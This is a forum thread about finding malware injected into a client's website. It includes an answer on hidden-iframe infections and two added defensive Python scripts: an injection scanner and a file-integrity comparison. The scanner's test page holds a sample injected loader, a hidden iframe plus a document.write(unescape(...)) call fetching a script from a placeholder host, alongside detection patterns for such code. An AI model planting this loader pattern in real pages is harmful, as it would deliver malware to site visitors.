Need some web people to give second opinion on tracking a virus on a website

I have a client who is being told their website is spreading viruses, or specifically the Trojan Horse Generic_r.bat. I do not handle the website design or hosting, only the internal network jobs.

The webmaster insists everything is fine, but we were flagged before with Google search (they were re-directing people who searched for us to a "This website is known to spread viruses" warning and gave the user a choice to continue or not). We reported it to them, they did something and it started working fine again. Now, dial forward three months, I have a random external consultant telling us our website gave them a virus, twice. Once it had to be cleaned, the other time it was picked up by the AV scanner she had loaded, both times soon after she went to the site.

I looked to see if there was a way to scan a website or its directory, but everything I see is for a local computer, not a web server. Any tips on this? It is really more for my own improvement, since the web host company is someone selected by the marketing company they contracted with to do their sales and marketing work, but I am interested in the tools they would use to try to prove or disprove this.
tsaico asked:

grahamnonweiler commented:
When a website is suspected of spreading viruses it normally means it has been the subject of a "SQL Injection" attack, which is where some malicious script (normally Javascript) has been inserted into the content of a page.

This was achieved either by submitting the script through a form, or more commonly by a remote controlled bot that searches through websites looking for vulnerabilities.

The actual script is often a hidden iFrame, that in turn causes your browser to download a script from another server not associated with the website you are viewing. This is also sometimes referred to as XSS or Cross Site Scripting attack.

Finding the infection is the job of the developer/owner of the website, as they will need to scan through their database to find the infected pages and correct it. This is carried out on the database server (or in smaller hosting environments the web server).

Now, if you use the HTTrack tool suggested above, you will certainly download the "infected" page, but it will not be identified by any conventional AV system. It will only be when you open the infected page in a browser on your local PC that the script will run.

Beware, you will still get infected as the Iframe will load the script from the external site!

HTTrack will not download the infection as it is called using Javascript, while HTTrack only uses conventional HTML links/urls to download pages.

If the website has indeed been the subject of SQL Injection then it means that the underlying scripts that are producing the website are of a poor standard, and little or no security has been considered by the developer.

Unfortunately, this level of coding/development is all too common on the web these days.
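The answer above describes what to look for in a mirrored copy of the site: hidden iframes, script tags pulling from a host that is not the site's own, and inline loaders built from `document.write`/`unescape`. It also notes that a conventional AV scan of the downloaded files will not flag these. As an added example (not code from any poster on this thread), the script below walks a local mirror such as an HTTrack download and reports exactly those indicators, without ever executing the page in a browser. The page samples and the `.invalid` hostnames are constructed for illustration; `site_host` is the hostname the mirror was taken from.

```python
"""Scan saved HTML pages (e.g. an HTTrack mirror) for injected content.

Flags three things the answer above describes:
  * <iframe> that is hidden (0/1 px, display:none, visibility:hidden)
    or that points at a host other than the site's own
  * <script src=...> that loads from a third-party host
  * inline scripts built on loader/obfuscation primitives
    (eval, unescape, document.write, String.fromCharCode)
"""
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Primitives that injected droppers use to hide the real payload URL.
SUSPICIOUS_JS = re.compile(
    r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(")


def _tiny(value):
    """True for width/height values like 0, 1, 0px that make a frame invisible."""
    return value is not None and value.strip().lower().rstrip("px") in ("0", "1")


class InjectionScanner(HTMLParser):
    """Collect (kind, detail, line) findings for one HTML document."""

    def __init__(self, site_host):
        super().__init__()
        host = site_host.lower()
        # "www.example.com" and "example.com" count as the same site
        self.site_host = host[4:] if host.startswith("www.") else host
        self.findings = []
        self._in_script = False
        self._script_buf = []
        self._script_line = 0

    def _is_external(self, url):
        host = (urlparse(url).hostname or "").lower()
        if not host:                      # relative URL -> same site
            return False
        return host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        line = self.getpos()[0]
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", ""), line))
            elif self._is_external(a.get("src", "")):
                self.findings.append(("external-iframe", a.get("src", ""), line))
        elif tag == "script":
            src = a.get("src")
            if src and self._is_external(src):
                self.findings.append(("external-script", src, line))
            # HTMLParser hands <script> bodies to handle_data verbatim (CDATA)
            self._in_script, self._script_buf, self._script_line = True, [], line

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            m = SUSPICIOUS_JS.search("".join(self._script_buf))
            if m:
                self.findings.append(("obfuscated-inline-script", m.group(1), self._script_line))
            self._in_script = False


def scan_html(html, site_host):
    """Return the list of (kind, detail, line) findings for one page."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def scan_directory(root, site_host):
    """Walk a local mirror and return {path: findings} for pages with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm", ".php")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_html(fh.read(), site_host)
                if hits:
                    report[path] = hits
    return report


# Constructed samples: a clean page and one carrying the injection pattern.
CLEAN_PAGE = """<html><head><title>Example</title>
<script src="/wp-includes/js/jquery.js"></script></head>
<body><p>Hello</p><iframe src="https://www.example.com/map"></iframe></body></html>"""

INJECTED_PAGE = """<html><head><title>Example</title></head><body><p>Hello</p>
<iframe src="http://unknown-host.invalid/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://unknown-host.invalid/x.js%22%3E%3C/script%3E'))</script>
<script src="http://cdn.unknown-host.invalid/stat.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail, line in scan_html(INJECTED_PAGE, "www.example.com"):
        print(f"line {line}: {kind}: {detail}")
```

Run `scan_directory("/path/to/mirror", "www.example.com")` against the HTTrack output; every hit names the file and line so the webmaster can look at the exact template or database row that produced it. Findings for an external script are only a lead, since analytics and CDN hosts are legitimately external, but a hidden iframe or a `document.write(unescape(...))` loader is almost never something the site's developer put there.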
 
Seaton007 commented:
You could use HTTrack to download the web site and then scan it locally: www.httrack.com
 
tsaico (author) commented:
Thank you for a very informative post. It seems the best way to help secure a WordPress site is to use one of several security plugins. I did find some websites that said the site was fine, but AVG had said two reports of infection were turned in over the last 30 days.

Since the plugins may or may not be installed already, I am not sure about its effectiveness, since any malicious code will already be in place, and all the plugins check for changes in code or page sizes, or a change in the checksum, all of which will stay the same if we are already infected.

Hopefully the web company hired by the marketing company that was hired by the company I work with does their due diligence and gets it resolved.
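The author's concern above is sound: a checksum baseline recorded after the injection simply enshrines the infected files as "known good". The way around it is to compare the live tree against a reference obtained independently (a fresh download of the same WordPress, theme and plugin versions), so the baseline cannot have been poisoned. The following is an added example, not code from any poster or from WordPress; it builds two small constructed directory trees in temporary folders to show what such a comparison reports, and the `wp-content/uploads/` handling (ignore ordinary uploads, still flag any `.php` dropped there) is an assumption about a typical layout.

```python
"""Compare a live web tree against an independently obtained clean copy.

Unlike a self-generated baseline, a reference tree downloaded fresh from
the vendor cannot already contain the injection, so modified, added and
missing files are all meaningful.
"""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Return {relative_posix_path: sha256_hex} for every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            manifest[rel] = h.hexdigest()
    return manifest


def compare_to_reference(reference_root, site_root,
                         ignore_prefixes=("wp-content/uploads/",)):
    """Diff the live tree against the clean reference.

    Files under ignore_prefixes are expected to differ (user uploads) and are
    skipped, except for .php files, which never belong in an upload folder.
    """
    ref = hash_tree(reference_root)
    live = hash_tree(site_root)
    modified = sorted(p for p in ref if p in live and ref[p] != live[p])
    added = sorted(p for p in live if p not in ref
                   and not (p.startswith(ignore_prefixes) and not p.endswith(".php")))
    missing = sorted(p for p in ref if p not in live)
    return {"modified": modified, "added": added, "missing": missing}


def _write(root, rel, content):
    """Helper for the constructed demo trees."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)


def demo():
    """Constructed trees: a clean reference and a live copy where one template
    gained an injected line, two files were dropped and one file is gone.
    Returns the comparison result."""
    with tempfile.TemporaryDirectory() as ref, tempfile.TemporaryDirectory() as live:
        for root in (ref, live):
            _write(root, "index.php", "<?php require 'wp-blog-header.php';\n")
            _write(root, "wp-includes/js/jquery.js", "/* jquery */\n")
        _write(ref, "readme.html", "<html>reference readme</html>\n")
        _write(ref, "wp-content/themes/site/footer.php", "</body></html>\n")
        # live copy: template with an injected frame (placeholder host)
        _write(live, "wp-content/themes/site/footer.php",
               '<iframe src="http://placeholder.invalid/" width=0></iframe></body></html>\n')
        # live copy: dropped files, contents are inert placeholders
        _write(live, "wp-content/uploads/cache.php", "<?php /* constructed placeholder */ ?>\n")
        _write(live, "wp-admin/.x.php", "<?php /* constructed placeholder */ ?>\n")
        _write(live, "wp-content/uploads/photo.jpg", "not really a jpeg\n")
        return compare_to_reference(ref, live)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice the reference is a clean extract of the exact versions the site runs, and anything reported under `modified` or `added` is what the hosting company needs to open and read, because the plugin-generated checksums the author mentions cannot distinguish those files from the originals once the baseline was taken after the fact.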